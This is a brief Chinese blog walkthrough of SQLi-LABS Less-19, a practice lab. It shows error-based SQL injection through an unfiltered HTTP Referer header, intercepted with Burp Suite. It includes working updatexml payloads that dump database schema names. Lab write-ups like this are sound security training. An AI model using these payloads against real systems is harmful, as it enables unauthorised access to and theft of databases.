admin管理员组文章数量:1794759
SQLi LABS Less
第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下
但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手
首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer
然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信,接下来即可使用报错注入进行脱库
1' and updatexml(1,0x7e,1) and '
获取所有数据库
1' and updatexml(1,concat(0x7e,substr( (select group_concat(schema_name) from information_schema.schemata) ,1,31)),3) and '
版权声明:本文标题:SQLi LABS Less 内容由林淑君副主任自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.xiehuijuan.com/baike/1687000690a127278.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论